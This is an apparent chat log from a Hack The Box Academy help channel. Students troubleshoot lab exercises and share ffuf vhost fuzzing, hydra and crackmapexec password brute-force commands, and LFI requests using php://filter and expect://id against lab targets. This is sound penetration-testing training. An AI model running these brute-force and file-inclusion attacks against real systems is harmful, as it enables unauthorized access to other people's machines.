hmm interesting. Then why does the module course material give ffuf -w ./vhosts -u http://192.168.10.10 -H "HOST: FUZZ.randomtarget.com" -fs 612 as the example for this exercise? Seems wack
Sounds like you didn't actually find it. You can DM me the path and js file name if you want me to confirm it
will do
actually i think that works too
in the pic i took i used the url though
make sure you have www.inlanefreight.htb added to your /etc/hosts file
@cloud urchin Well ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://10.129.226.112 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918 didn't get any hits,
but ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://www.inlanefreight.htb -H "HOST: FUZZ.inlanefreight.htb" -fs 10918 does give me hits.
and yeah I got both www.inlanefreight.htb and inlanefreight.htb in /etc/hosts. Thanks for the help.
ok so I have a list of subdomains on the target, but not seeing a flag anywhere. Visiting them and using curl on them are producing no results.
Your first command looks correct from what i see, whats the output?
are you visiting the vhosts?
Yeah in my browser and with curl. I'm just getting default apache2 ubuntu page
for that first command. Literally nothing. Just the amount of tries it has attempted. No vhosts are shown.
no clue why IP doesnt work, if you have em in /etc/hosts
i see that you got some outputs but cant curl, as far as i remember if you didnt filter the 10918 out you would get a ton of default ubuntu installation pages but you did filter it out. mind sharing your curl command?
iirc for vhosts you'll need to use the domain and not the ip
mine worked with the ffuf IP


I've tried:
||curl -s http://customers.www.inlanefreight.htb -H "Host: customers.www.inlanefreight.htb"
curl -s http://www2.www.inlanefreight.htb
curl http://citrix.www.inlanefreight.htb||
and I'm not using pwnbox, but might jump on it to complete this if I have to lol
huh why are the subdomains before www
what the heck is this
that doesnt look right
i don't understand this
you added to every subdomain a www which isnt correct
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://blah.com -H "HOST: FUZZ.blah.com"
you need blah.com in your /etc/hosts
That makes sense. I thought I needed the www because of this
www is already a subdomain, if you want to visit another, you'll need to replace that
subdomain.domain.tld
that's the format for urls
right. I thought I was supposed to find sub domains of the sub domains lol
I'm still not getting any hits with this though. How long do you have to let the wordlist run to get the vhosts?
are you try to fuzz on subdomains for www.inlanefreight.htb or what ?
did you add specifically inlanefreight.htb to your hosts file
if you trying to get access to www.inlanefreight.htb just add it to you /etc/hosts
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -u http://inlanefreight.htb -H "HOST: FUZZ.inlanefreight.htb" -fs 10918
maybe the fs is wrong
it was the correct one for me aswell
worked fine for me
you mentioned earlier this also worked for you, add the vhosts you found in your /etc/hosts and visit them for the flags
Aha, I need a lot of heat on the roads for five bucks TR300006400000134032350237
huh? i dont remember adding the subdomain you found to your /etc/hosts?
I did, and all I got was Apache2 Ubuntu Default Page
whats the size of the valid sites?
I'm not getting anything 😦
your command is not the same as mine
It doesn't make sense but try With Http://www.inlanefreight.htb
-H.......?
yeah I get hits with http://www.inlanefreight.htb
But as I said before, when I visit these subdomains, I only see the Apache2 Ubuntu Default Page.
show your /etc/hosts
if you have the correct vhosts in /etc/hosts with the same ip as the www.inlanefreight.htb one, it should work
actually don't show your /etc/hosts because that'd probably break rules
but i'm guessing that's the issue, because if you don't set that up then you'll get the default apache page
Got it. I still had the subdomain.www.inlanefreight.htb in my etc/hosts.
Thanks for the help everyone. That took way more time than it should have lol
Hello everyone!
I am here to ask for your support in fixing an OpenVPN error. As shown in the course, when I try to connect using the "academy-regular.ovpn" file, I encounter an error: "WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set."
This occurs when I try to open the file from the downloads folder. When I try to open it without navigating to the folder, it displays the error: "Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn."
I have tried all the solutions from forums, YouTube, Reddit, and even searched for a solution on the TryHackMe forums regarding OpenVPN, but I couldn't resolve it.
I have attempted to connect to all the servers and even changed to TCP 433, but I still couldn't fix it. So, I'm reaching out to ask for your help. What could be the solution? Am I doing something wrong?
I have attempted to connect using both the website and VMware. In my VMware, I'm using Parrot OS HTB.
that looks fine, I don't see any errors about opening the config file
run ifconfig, if you see an ip for tun0 you're good, open another terminal and do your things
Thank you! Let me try and come back again.
I did as you told, run ifconfig, my ip is still the same but I can see tun0.
Does this mean I am connected? @next bronze
sudo killall openvpn, connect again, then go do a module
After running 'sudo killall openvpn' and reconnecting, I got this:
you are ready to go
try to ping your target
yeah you're good
nice troubleshooting skills
fyi if you want to run it outside of the downloads folder, give it the full path, i.e. sudo openvpn /home/user/Downloads/academy-regular.ovpn
I'd recommend doing the Information Security Foundations path
Dang! I'll save this and remember. I am a total newbie and this will help me a lot. Thank you!
as xreous said go for the security foundations paths
@next bronze @limber river Okay! I will do that. Thank you 👍
Doing password attacks, network services
just having a question about RDP, did someone try it with crackmapexec? i saw its not covered in the module but when checking out crackmap it has the possibility?
hydra works with rdp
did you change the command much? i went through the crackmapexec rdp --help and didnt see anything important that i would need to change
yea just wanted to go with crackmap through all of em first then with hydra
i didn't use CME for it, i used crowbar
ah ic
ssh and winrm both went flawlesly with crackmap, dont know yet why rdp doesnt function well
btw ~ is the shortcut for your 'home directory' so you can just do ~/Desktop/pass.list or whatever
imagine still using cme
don't mad dog cme
i know but im again out of my country and have to work on this shitty macbook and i have no clue where that button is , i even struggled to find @ xD
well cme isnt worked on anymore so maybe that broke something with rdp, ill use hydra
Hi all! i am doing LDAP module this is the question..What is the domain functional level?
i am doing my query but the answer is wrong..
also tbh 1000 cubes for this module is a theft...
yeah i thought it was pretty weak for a 1000 cube module..
LDAP Anonymous Bind section
i mean i am using the go version of windapsearch which is only 4 years old
Hi, I just found two flags in one lesson. But the lesson only needs one, does that happen more often? It's about: https://academy.hackthebox.com/module/19/section/108
in the module the tool they recommend is 8 years old
you need to use --functionality
in this version its the metadata is the equivalent
i used ldapsearch-ad.py with -t info and got it
it's supposed to be the year btw, just give it the server version https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/active-directory-functional-levels
Xre0uS' command will work too
they are reusing services(nothing wrong with that) and you maybe got a flag for one of the next section questions, happend to me too
I guess I'll keep a note so I can submit it later haha
Hi again!
I was able to connect with ssh htb student..... but when I type the password it says Permission denied.
Am I missing something?
enter the right password then
you can copy and paste
and in the future, include the module and section so that people will know the context
I have problem with last question of module Network Services
Hey. Why i am getting
smb: > ls
NT_STATUS_ACCESS_DENIED listing *
I've found credentials of john... (Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.)
access denied is a permission issue, the user you're using doesn't have permission to do that
But how am i supposed to do it then? I've used bruteforce smb with given pass-user lists and found john credentials. There are no other occurrences
how did you brute force it?
Though crackmapexec
then you'll need to --continue-on-success or use another tool
Thank you!
even though i cancelled the sub ?
because there are modules i still didnt finish
he said all 100% completed modules belong to you
hey guys, someone up for a little help on "Exploiting Web Vulnerabilities in Thick-Client Applications" section in
"Attacking Common Applications" module please ??
was planning to do the Active Directory Trust Attacks module but the target won't spawn
guess I'm not doing it 
the explanation in the module doesn't make sense ...
you bought it ?
yeah I have thousands of cubes to be used
just get money 
you push me to do bad things
Hi there! can someone help with Password attacks medium lab? I've got zip archive from smb share, but when trying to crack the password of it, by using john and multiple password lists with different formats - im just getting nothing
try a mutated list
Poor solutions
hello, I'm new in cybersecurity and I'm trying to learn through the HTB Academy (path: Information Security Foundations). I like to understand and manipulate tools, but in the module "Setting up" there are a lot of things that seem not mandatory but also useful. I don't get the point of talking about those things but not making them clearly understandable, like Tmux (a video of a man just speedrunning options and his key bindings), modifying bashrc to modify the prompt but writing just after that to keep it simple, talking about command and vps but not explaining how to set one up (just some specific cases where it would be useful were told).
It feels like if I don't get knowledge about that I would skip some important info, but it also feels like it's not important. Can someone tell me if I should just go through, like it's ok to not understand it at 100% (sorry, bad eng, I'm a bit confused about this module)
so what's the point of doing all that if it's not useful...
a lot of things you'll need to research yourself if you want to know more, tmux, bashrc and vps could be modules on their own, but they're not essential to finishing the path, they're good information for you to know and explore yourself
thanks for clarification!
Hi guys , anyone who completed the module password attacks that can explain me why my RDP brute force is not working ? :/
Crackmapexec?
I tried these commands , they show output , but only false positives :/
I got 3 out of the 4 flags , just the RDP one is not working , kinda frustating :/
Iirc cme wasnt getting worked on anymore.
So most likely something broke with maybe a new rdp version.
Just dont use cme, use hydra or smthing
Hydra was the same thing :
Just in case , I'm using the list they provided , and I added inside the users found in the sever
Can anyone who has completed the attacking common services easy lab please dm me? I have got the flag but apparently there are two methods and I'd like to understand the second one
Whats the output? False positives?
Yea command looks good, worked for me like 3 hours ago(from what i can remember)
With hydra yes, like 4 password available for each user ; using cme and crowbar , no output
You provide a password.list but where is the hash or the hash file it wants to compare with?
Oh nvm now i see it
Have you tried via pwnbox?
No , is there a diference ?
it could help
Ok let me try 🫡
Maybe your internet connection was unstable giving you false positives?
I don't think that can be an issue , i tested in 2 different ( irl) locations as well :
Hey.
```hydra -l fiona -P /usr/share/wordlists/rockyou.txt 10.129.59.142 smtp -t 64 -f```
I am trying to get through "Attacking Common Services - Easy". Found username with smtp-enum but now struggling to bruteforce smtp. I've tried rockyou.txt and provided passlist but nothing has shown up. Any hints?
No clue then. I would check out on the pwnbox, since the command looks the same as i used it
sorry
Yes , I'm launching hydra in pwnbox, because I thought it would be easy ahhaha
No problem , thanks already for helping mister !
You did the last question aswell? Im pretty sure there you find the rdp password aswell
When cracking it, if you left it at user.list and password.list
It found every password we used before for other services
Using cme ? It only gave me 2 users not all
I think i used hydra for smb aswell, and it gave my others too. Like 4 together iirc. Ill be home in 10-15min so i can double check
Maybe used cme tho since i had to use --continue-on found or whatever is the command
Yes, I need to get the laptop so I can tell you what I used , I think hydra for ssh ,smb user , cme for winrm and smb shares , not sure tho
Ahhh let me check that aswell
Please guys...
Can you please tell me which VPN server you are using to spawn the target?
was eu-2 I think, switched to us-3 and it's fine
Thank you, I will verify from our end as well.
Just got.home. yea used crackmapexec on the smb got all 4 passwords there
Yeah I don't know , crackmapexec is not even working anymore

update : finally did it 😄 thanks
I'm pretty sure you use the list provided, but i don't have anything in my notes about this
Hey guys. i am doing skills assesment on the LDAP module.What non-default privilege does the htb-student user have? this is the question, i saw earlier someone told that i need to run an elevated powershell but its not possible.
all of them
Restart box
already did twice
this shit module cost 1000 cubes
outdated as f****
chatgpt makes better queries
and it is very slow
a copy paste takes 20 second
well i tried all privs one worked..
I don't know what to tell you then since all of them does not tell anyone anything when there's only one thing in the section I said to look at was and you replied a while back curl which also is not on that page.
😄
may I dm about the module? running into some unexpected problems, not sure if it's skill issue
Before connecting to the target you must wait 3-5 minutes
Hey, sure!
)
Haha 
indeed
not sure yet, still on the first part, but seems pretty good
Are there any free Active Directory machines on HTB?
No I think u should check Active directory 101 track but it requires subscription
Guys am fresh student need someone who'd want to help me.witb just feel knowledge when I stuck on a question..thank you guys
Thank you
Doubts in Broker HTB machine(Privilege escalation), Anyone?
hello guys im new to linux and im taking the linux fundamentals course. Could anyone help me with the second task?
It may be a bit overwhelming at first to deal with so many different tools and their functions if we are not familiar with them. Take your time and experiment with the tools. Have a look at the man pages (man <tool>) or call the help for it (<tool> -h / <tool> --help). The best way to become familiar with all the tools is to practice. Try to use them as often as possible, and we will be able to filter many things intuitively after a short time.
Here are a few optional exercises we can use to improve our filtering skills and get more familiar with the terminal and the commands. The file we will need to work with is the /etc/passwd file on our target and we can use any shown command above. Our goal is to filter and display only specific contents. Read the file and filter its contents in such a way that we see only:
- A line with the username cry0l1t3.
- The usernames.
- The username cry0l1t3 and his UID.
cat /etc/passwd | grep cry0l1t3
Injection Attacks: Skills Assessment
I've found the PDF Generation vulnerability and I've found the XPATH injection, but I'm unable to get any useful data from it. I haven't figured out how to read the source code of the internal site, either. Can anyone that's completed this offer me a nudge?
Just start to dump data with xpath injection you dont need the source code.
Could anybody send me the answers for Practical Digital Forensics Scenario and Skills Assessment (SOC Analyst)? Thank you
nah

You don't learn anything if someone simply sends you the answers.
What stuff in the cpts path doesn’t need for oscp?
SQLmap I think. This tool is not allowed in OSCP as far as I know
You're right. It's not allowed.
I c
You don't need to cat to grep
ah right
nice, didnt know that
I believe as well if you add -n it'll tell you line number it's been a sec
-A, -B, and -C are context flags
A for after, B for Before, C for context around so like a combination of a and b
I'm currently going through the starting point machines, on sequel. I can scan the target with nmap, however if I use any flags in my scan it gets stuck at 0%. My next task is to obtain the version of MySQL running, however if I use nmap -sV <IPADDRESS> it gets stuck, and also tried nmap -sV -p 3306 <IPADDRESS>. Also tried sudo. However if I just use nmap <IPADDRESS> it works fine. Any idea?
this channel isn't for the starting-point machines; there's the #starting-point channel (read and follow #welcome to access it)
Attacking Common Services - Easy
what a great lab, really enjoyed it, my struggle was not using rockyou, i thought i have to use the lists from resources :/
btw i used the way with mysql, not the way with the XAMP vuln
where i can report a possible bug in a module ?
Hi
I need help with this command
```
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
allow_url_include = On
```
Explain what the problem is you're facing - that command is valid, but what do you expect it to do?
- that is not my command...when I ran the first command I saved it to a file called phpgrep.txt
- I want whatever command I run next to say "allow_url_include = On"
I had to save the very first command I ran to a phpgrep.txt file as I couldn't paste the content to the screen as it was too big
That step is simply to demonstrate encoding text in base64, for use in the next step in the module
ill tell u the commands I ran
cat phpgrep.txt | base64 > new.txt | grep allow_url_include
before I ran the above command I ran this
curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
That step is part of information gathering. This is used in the next step in order to achieve your goal.
this module didnt say anything about information gathering?
You're reading the PHP config, and checking to see if an option is enabled
Confirming it is means you can continue to utilise the method described in the next step
You gathered information by reading data from the PHP config file on the target
This allows you to determine what method you could use to move further in to the target
Read up on what the allow_url_include option actually means and enables
It's also described in the module
yes it should say "allow_url_include = On" and not just give me a bunch of random strings, right?
The fact you got that output means you have confirmed that option is enabled in the PHP configuration on the target
Move to the next step, Remote Code Execution, it may make more sense then 🙂
Essentially the request you sent above utilized a feature in PHP to use filters to perform actions on the target. Some actions are enabled by default, others are not.
The action in that step allowed you to retrieve the php.ini config file from the target, in order to determine which options are enabled on the target.
thank you..its kinda hard to understand this particular page atm and I'm not enjoying it 😦
Hi, I'm running this command curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id" and its catting out the html file 😅
shouldn't it create a shell for me? or am I mistaken?
That step should execute a command and return the output. I'm afraid I can't stick around to help any more, I need to turn the light out and go to sleep
For last bit of help, DM me the output from that command
okay thank you Ill dm u now
hello i can help if you are stuck or anything since he is out 😴
could use some help with ATTACKING WEB APPLICATIONS WITH FFUF skills assessment: One of the pages you will identify should say 'You don't have access!'. What is the full page URL?
I got the correct answer, but only because someone posted it in here, and I saw the endpoint.
Why does ||ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:31822/courses/FUZZ -recursion -recursion-depth 3 -e .php,.php7,.phps -fs 287 ||
or ||ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://faculty.academy.htb:31822/FUZZ -recursion -recursion-depth 3 -e .php,.php7,.phps -fs 287||
not reveal the file for this question? The correct endpoint is clearly in the ||directory-list-2.3-small.txt|| wordlist. It should only take ||5641|| or so requests to find it, but i'm at almost 200K request with no hits.
What am I doing wrong?
Hi pixel, yeah I could use some help 😢
stuck on this page
What exactly are you confused/stuck about it
yeah ofc
thanks man
struggling spawning machine, specifically "Nibbles - Enumeration", stuck on " Target is spawning..."
Same. Tried to change vpn and it gave me a file simply called ovpn instead of academy-regular.ovpn
It can take a minute sometimes
i notice when its working and you refresh, it stays spawning, if its not working or stuck and you refresh it will ask you to spawn
Likely due to events pending to be published to the browser - unsure if the state is polled on page load or not, I would have thought so.. but I don't know 100%
yeah had the same problem a while back
but for me i couldnt spawn it at all for a couple of days 💀
I think it's some mix of the call not going so it stays in the loading state
I.e. pushing the power button but nothing turns on
Looks like a legit issue - on load, even if the machine is spawning the machine state comes back as "not spawning". Will raise it with the team.
..I think
Hm no, I see machine is spawning after a refresh still
Interesting

me doing mutated passwords section

